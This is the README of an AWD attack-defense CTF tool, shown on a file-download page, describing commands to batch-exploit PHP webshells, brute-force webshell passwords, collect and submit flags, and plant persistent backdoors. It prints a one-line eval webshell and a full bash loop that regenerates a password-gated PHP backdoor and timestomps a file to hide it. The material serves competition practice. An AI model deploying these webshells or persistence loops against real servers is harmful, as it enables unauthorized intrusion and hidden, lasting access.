AWD Predator Framework v2.0
--code by AresX
* 在AWD攻防赛中通过给定的webshell批量获取提交flag
* 为不会现场挖洞写脚本的菜鸡准备
* 用py去实现菜刀是一件代码量很大的事情,懒得做也不会做(以后可能会做),所以需要手动设置一句话的功能函数和方法
* 针对简单的单参数传递的一句话和特定的加密一句话
# 启动
python console.py
# webshell
**添加已知的webshell,仅支持php,GET和POST方法使用eval和exec函数的一句话木马**
### 添加webshell
命令`add`
使用方法: `add [shell path] [pwd] [type(eval/exec)] [method(get/post)]`
如一句话为`<?php @eval($_POST[‘cmd’]);?>` 路径为`x.x.x.x:8001://index/cmd.php`
一句话密码为`cmd` 功能函数为`eval` 方法为`POST`
example:`add :8001/index/cmd.php cmd eval post`
注意这里添加一句话路径不加ip地址,ip地址要使用命令`ip`生成
命令执行后webshell的路径和密码会以字典的形式储存
**处理了使用md5加密的eval函数一句话,**
get方法在添加时,可添加带md5加密的密码的路径
如:`add :8003/x.php?pass=fuckyou x eval get`
post方法请在`flag.py`中修改`for j in POST_eval_shells_path_pwd:`循环中的`eval_POST_data['pass']`为自己的密码,密码将被自动传递
post添加方法同`add :8001/index/cmd.php cmd eval post`
### 显示添加的webshell
命令`show`
将显示所有添加的webshell路径和密码
### 保存,读取,清空webshell
*保存已经添加的webshell路径和密码,方便临场修改代码*
保存:`save`
读取:`load`
清空:`clear` //清空不会清空已经储存的webshell,除非在清空后执行保存命令
### Webshell爆破
*采用一种提速千倍的爆破方法*
命令: `crack http://xxx.php`
字典储存在`auxi/pwd.txt`中,可自行完善字典
# iplist
**根据输入生成指定段的ip列表**
### 生成列表
命令: `ip x.x.a-b.x`
可设定acb任意段的ip列表,使用'-'连接左右区间
### 添加指定ip
命令: `ip x.x.x.x`
执行命令后,`x.x.x.x`将被添加到ip列表中,会自动去除重复项和进行排序
### 查看已经生成的列表
命令: `showip`
显示生成的ip列表
### 清空ip列表
命令: `clearip`
### 去掉指定ip
命令: `removeip x.x.x.x`
# flag
**通过iplist和webshell获取flag,将获取到的flag提交到指定服务器**
### 获取flag
*遍历iplist中所有的地址尝试通过所有已经添加的webshell获取flag,在执行此命令前需设定iplist,否则报错*
命令:`getflag [command]`
example:`getflag curl www.baidu.com/flag.txt`
获取命令如果不需要修改只需完整输入一次,之后可直接执行`getflag`
### 查看flag
命令: `showflag`
### 提交flag
**攻防赛环境中获取到的flag通常不是标准格式,`flag.py`中的`submit_flag`函数中已经使用了`re.compile(r'flag{\w+?}')`尝试匹配标准flag格式**
**如果出现问题,请自行在`flag.py`文件的`submit_flag`函数中使用正则匹配获得标准flag进行提交**
*提交flag 需设定提交flag的链接,以及cookie和data,使用"?"替换flag在data中所在的参数*
命令: `submit [url] [cookie] [data](use '?' replace the flag )`
example: `submit http:xxx.xxx.xx/xx/ JSESSIONID=A6F8;route=6cf03 pid=-1&pidName=&flag=?`
**去掉cookie中的空格,data中flag所在位置需用?代替!**
提交命令如果不需要修改只需完整输入一次,之后可直接执行`submit`
submit完成之后会有清空flag的选项(y/n)
### 清空flag
命令: `clearflag`
# 上传
## 文件木马上传
命令: `upload <file>(default='auxi/shell.php')`
默认上传文件为`auxi/shell.php` 如需使用修改默认文件,默认文件为加密不死马
如需上传其他文件,将文件储存在`auxi/`目录下
执行`upload xxx`即可
如上传默认文件,直接执行`upload`
如果文件上传成功,会自动访问一次上传的文件,激活不死马
## 命令木马上传
命令: `cupload`
连接一句话执行bash命令生成不死马`.index1.php`
bash命令为:`system('while true;do echo \'<?php if(md5($_POST["pass"])=="3a50065e1709acc47ba0c9238294364f"){@eval($_POST[a]);} ?>\' >fuck.php;touch -m -d "2017-11-12 10:10:10" .index1.php;sleep 1;done;');`
如果要修改请修改`command.py`中的`data[z0]`
---
### 目录结构
```
###########
├── Readme.md //帮助文档
├── console.py //启动
├── core // 核心模块
│ ├── shells.py //写入,读取,保存webshell
│ ├── flag.py // 获取,提交flag
│ ├── iplist.py // 生成ip列表
│—— auxi //辅助模块
| |—— upload.py //webshell上传功能
| |—— shell.php //默认上传文件
| |—— webshell.txt //一句话储存路径
| |—— command.py //上传bash不死马
|—— data //webshell数据储存
```
没有合适的资源?快使用搜索试试~ 我知道了~
CTF线下赛AWD脚本合集

共154个文件
py:60个
pyc:23个
txt:14个

需积分: 5 57 下载量 43 浏览量
2024-08-25
21:03:26
上传
评论 10
收藏 369.14MB ZIP 举报
温馨提示
资源概述: 本人在长城杯、蓝桥杯、巅峰极客等线下AWD攻防比赛所用到的全部工具(如WAF、EDR、文件监控脚本、文件还原脚本、混淆战局工具、流量监控工具、批量拿分脚本模板)和脚本以及教程及笔记还有练习平台和靶场源码,并取得了很多奖项,故在此分享这些资源,希望有需要的人能得到帮助。 目录: 文件变化实时监控工具 go文件监控 CTF-WAF AWD脚本 awd_attack_framework 批量拿分脚本 搅屎棍脚本 文件还原脚本 笔记x8 前期准备教程 不死马x6 AWD训练平台源码 AWD靶场合集 大型WAF源码 漏洞识别工具
资源推荐
资源详情
资源评论



















收起资源包目录





































































































共 154 条
- 1
- 2
资源评论


Pluto-2003
- 粉丝: 2706
上传资源 快速赚钱
我的内容管理 展开
我的资源 快来上传第一个资源
我的收益
登录查看自己的收益我的积分 登录查看自己的积分
我的C币 登录后查看C币余额
我的收藏
我的下载
下载帮助


最新资源
- STC89C52RC单片机手册.doc
- lowRISC-硬件开发资源
- 网络安全评估和安全法规.ppt
- 高质量C++编程学习笔记.doc
- 欧司朗普通照明产品网络营销年度方案.pptx
- 某网络系统有限公司商业计划书.docx
- 楼宇自动化论文(1).pdf
- 通信设备公司财务管理手册.doc
- 气象局网络视频监控系统方案.doc
- 2022年MATLAB复习知识点整理版.docx
- 中国网络广告效果营销发展趋势――效果网提供.ppt
- 建立卫生网络体系提升群众医疗保障水平调研思考.pdf
- 网络安全宣传周的活动总结2021年.doc
- 中铁工程项目管理标准化手册检查用表(30个).docx
- 基于AT89C51单片机的16x16LED点阵显示的课程设计.doc
- 中国人民银行招聘笔试计算机习题1.docx
资源上传下载、课程学习等过程中有任何疑问或建议,欢迎提出宝贵意见哦~我们会及时处理!
点击此处反馈



安全验证
文档复制为VIP权益,开通VIP直接复制
